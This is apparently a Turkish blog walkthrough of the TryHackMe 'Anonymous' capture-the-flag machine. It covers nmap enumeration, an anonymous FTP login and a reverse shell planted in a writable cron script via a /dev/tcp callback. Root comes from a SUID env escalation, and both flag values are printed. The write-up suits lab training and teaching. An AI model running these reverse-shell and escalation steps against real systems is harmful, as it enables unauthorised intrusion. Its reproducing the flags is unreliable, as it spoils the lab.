Post

Anonymous

Posted Updated
Preview Image
By Umut Sağlam 5 min read

Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.

Anonymous

nmap çalıştıralım.

1
2

┌──(root㉿r3tr0)-[~]
└─# nmap -T5 -v -sV  10.10.20.162

nmap çıktısı:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-12 01:24 EST
NSE: Loaded 46 scripts for scanning.
Initiating Ping Scan at 01:24
Scanning 10.10.20.162 [4 ports]
Completed Ping Scan at 01:24, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:24
Completed Parallel DNS resolution of 1 host. at 01:24, 0.00s elapsed
Initiating SYN Stealth Scan at 01:24
Scanning 10.10.20.162 (10.10.20.162) [1000 ports]
Discovered open port 21/tcp on 10.10.20.162
Discovered open port 445/tcp on 10.10.20.162
Discovered open port 22/tcp on 10.10.20.162
Discovered open port 139/tcp on 10.10.20.162
Completed SYN Stealth Scan at 01:24, 1.91s elapsed (1000 total ports)
Initiating Service scan at 01:24
Scanning 4 services on 10.10.20.162 (10.10.20.162)
Completed Service scan at 01:24, 11.28s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.20.162.
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Nmap scan report for 10.10.20.162 (10.10.20.162)
Host is up (0.10s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds
           Raw packets sent: 1005 (44.196KB) | Rcvd: 1002 (40.096KB)

Makineyi numaralandırın. Kaç port açık?

4

21 numaralı bağlantı noktasında hangi hizmet çalışıyor?

ftp

139 ve 445 numaralı bağlantı noktalarında hangi hizmet çalışıyor?

smb

ftp servisine anonymous olarak girmeyi deniyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

┌──(root㉿r3tr0)-[~]
└─# ftp 10.10.20.162
Connected to 10.10.20.162.
220 NamelessOne's FTP Server!
Name (10.10.20.162:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||8298|)
150 Here comes the directory listing.
drwxr-xr-x    3 65534    65534        4096 May 13  2020 .
drwxr-xr-x    3 65534    65534        4096 May 13  2020 ..
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||45177|)
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 .
drwxr-xr-x    3 65534    65534        4096 May 13  2020 ..
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1118 Nov 12 06:29 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.
ftp> get clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||30118|)
150 Opening BINARY mode data connection for clean.sh (314 bytes).
100% |****************************************************************|   314        2.62 MiB/s    00:00 ETA
226 Transfer complete.
314 bytes received in 00:00 (3.35 KiB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||37011|)
150 Opening BINARY mode data connection for removed_files.log (1118 bytes).
100% |****************************************************************|  1118        6.42 MiB/s    00:00 ETA
226 Transfer complete.
1118 bytes received in 00:00 (11.97 KiB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
229 Entering Extended Passive Mode (|||48492|)
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
100% |****************************************************************|    68      205.59 KiB/s    00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.72 KiB/s)
ftp> exit
221 Goodbye.

İndirdiğim dosyaları inceliyorum.

clean.sh dosyasının içerisine reverse shell kodu ekliyorum ve put komutuyla ftp servisine gönderiyorum.

1

sh -i >& /dev/tcp/10.14.61.127/1234 0>&1

netcat çalıştırmayı unutmayalım.

1

nc -nvlp 1234

Kısa bir süre bekledikten sonra makineye erişim sağlıyoruz.

Shellimizi stabil hale getirelim:

1

python3 -c 'import pty; pty.spawn("/bin/bash")'

user flag:

90d6f992585815ff991e68748c414740

Yetkimizi yükseltelim ve root bayrağına ulaşalım.

find / -perm -04000 -type f 2>/dev/null komutu ile SUID dosyalarını inceliyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

namelessone@anonymous:~$ find / -perm -04000 -type f 2>/dev/null
find / -perm -04000 -type f 2>/dev/null
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9066/bin/mount
/snap/core/9066/bin/ping
/snap/core/9066/bin/ping6
/snap/core/9066/bin/su
/snap/core/9066/bin/umount
/snap/core/9066/usr/bin/chfn
/snap/core/9066/usr/bin/chsh
/snap/core/9066/usr/bin/gpasswd
/snap/core/9066/usr/bin/newgrp
/snap/core/9066/usr/bin/passwd
/snap/core/9066/usr/bin/sudo
/snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9066/usr/lib/openssh/ssh-keysign
/snap/core/9066/usr/lib/snapd/snap-confine
/snap/core/9066/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/env
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/pkexec

Buradaki /usr/bin/env dikkatimi çekiyor ve gtfobins sitesine gidip yetki yükseltip yükseltemeyeceğime bakıyorum.

/usr/bin/env /bin/sh -p komutu ile yetkimizi yükseltelim.

root flag:

4d930091c31a622a7ed10f27999af363

fsoc

TryHackMe
Medium Linux Permissions
This post is licensed under CC BY 4.0 by the author.